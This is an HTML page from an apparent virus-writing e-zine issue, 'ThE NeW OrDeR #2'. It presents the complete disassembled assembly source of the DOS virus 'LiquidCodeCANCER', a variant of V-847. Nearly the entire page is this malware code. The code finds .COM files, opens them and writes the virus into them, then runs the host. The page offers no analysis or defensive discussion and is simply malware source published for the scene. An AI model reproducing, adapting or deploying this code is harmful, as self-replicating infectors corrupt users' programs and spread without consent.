<html>

<head>
<meta http-equiv="Content-Type"
content="text/html; charset=windows-1251">
<meta name="GENERATOR" content="Microsoft FrontPage Express 2.0">
<title>ThE NeW OrDeR #2</title>
</head>

<body bgcolor="#000000" link="#0000FF" vlink="#000080"
bgproperties="fixed" topmargin="15" leftmargin="20" "
vlink="#000080">

<p align="center"><img src="../Images/viruz.gif" width="560"
height="100"></p>

<p align="center"><font color="#FF0000" size="5"><strong><img
src="../images/Rs.jpg" width="640" height="12"></strong></font></p>

<p align="center"><font color="#FF0000" size="5"><strong><img
src="../Images/fogskul.gif" alt="OneHalf  Virii" width="160"
height="100"></strong></font></p>

<p align="center"><font color="#FF0000" size="6"><strong>LiquidCodeCANCER</strong></font></p>

<p align="left"><font color="#00FFFF"><strong>;
--------------------------------------------------------------------------<br>
; Disassembled by FairWind / NRG , nrgteam@mail.ru<br>
;
--------------------------------------------------------------------------</strong></font></p>

<p align="left"><font color="#FFFFFF"><strong>page ,132<br>
name LiquidCodeCANCER<br>
title LQCancer - a mutation of the V-847 virus<br>
.radix 16<br>
<br>
code segment<br>
assume cs:code,ds:code<br>
org 100<br>
<br>
olddta equ 80<br>
virlen equ offset endcode - offset start<br>
smalcod equ offset endcode - offset transf<br>
buffer equ offset endcode + 100<br>
newdta equ offset endcode + 10<br>
fname = newdta + 1E<br>
virlenx = offset endcode - offset start<br>
<br>
start:<br>
jmp cancer<br>
<br>
ident db 'LiquidCode&lt;tm&gt;'<br>
counter db 0<br>
allcom db '*.COM',0<br>
vleng db virlen<br>
n_10D db 3<br>
progbeg dd ?<br>
eof dw ?<br>
handle dw ?<br>
<br>
cancer:<br>
mov ax,cs<br>
add ax,1000<br>
mov es,ax<br>
inc [counter]<br>
mov si,offset start<br>
xor di,di<br>
mov cx,virlen<br>
rep movsb<br>
<br>
mov dx,newdta<br>
mov ah,1A<br>
mov ah,ah<br>
int 21<br>
mov ah,ah<br>
mov dx,offset allcom<br>
mov cx,110b<br>
mov ah,4E<br>
int 21<br>
jc done<br>
mainlp:<br>
mov dx,offset fname<br>
mov ax,3D02<br>
int 21<br>
mov [handle],ax<br>
mov bx,ax<br>
push es<br>
pop ds<br>
mov dx,buffer<br>
mov cx,0FFFF<br>
mov ah,3F<br>
int 21<br>
add ax,buffer<br>
mov cs:[eof],ax<br>
<br>
xor cx,cx<br>
mov dx,cx<br>
mov bx,cs:[handle]<br>
mov ax,4200<br>
int 21<br>
jc close<br>
<br>
mov dx,0<br>
mov cx,cs:[eof]<br>
mov bx,cs:[handle]<br>
mov ah,40<br>
int 21<br>
<br>
close:<br>
mov bx,cs:[handle]<br>
mov ah,3E<br>
int 21<br>
<br>
push cs<br>
pop ds<br>
mov ah,4F<br>
mov dx,newdta<br>
int 21<br>
jc done<br>
jmp mainlp<br>
<br>
done:<br>
mov dx,olddta<br>
mov ah,1A<br>
int 21<br>
<br>
mov si,offset transf<br>
mov cx,smalcod<br>
xor di,di<br>
rep movsb<br>
<br>
xor di,di ;Clear DI<br>
mov word ptr cs:[progbeg],0<br>
mov word ptr cs:[progbeg+2],es<br>
jmp cs:[progbeg]<br>
<br>
transf:<br>
push ds<br>
pop es<br>
mov si,buffer+100<br>
cmp [counter],1<br>
jne skip<br>
sub si,200<br>
skip:<br>
mov di,offset start<br>
mov di,di<br>
mov bx,0ffff<br>
mov cx,bx <br>
mov ah,ah<br>
sub cx,si<br>
rep movsb<br>
mov word ptr cs:[start],offset start<br>
mov word ptr cs:[start+2],ds<br>
jmp dword ptr cs:[start]<br>
endcode label byte<br>
<br>
int 20<br>
int 20<br>
<br>
db 0<br>
<br>
code ends<br>
end start</strong></font></p>

<p align="center"><a href="../TNO#2_start.htm"><img
src="../images/14ic3.gif" border="0" width="60" height="65"></a></p>

<p align="center"><a href="mailto:nrgteam@mail.ru"><img
src="../images/coollogo_com_7565375.jpg" border="0" width="206"
height="53"></a></p>
</body>
</html>
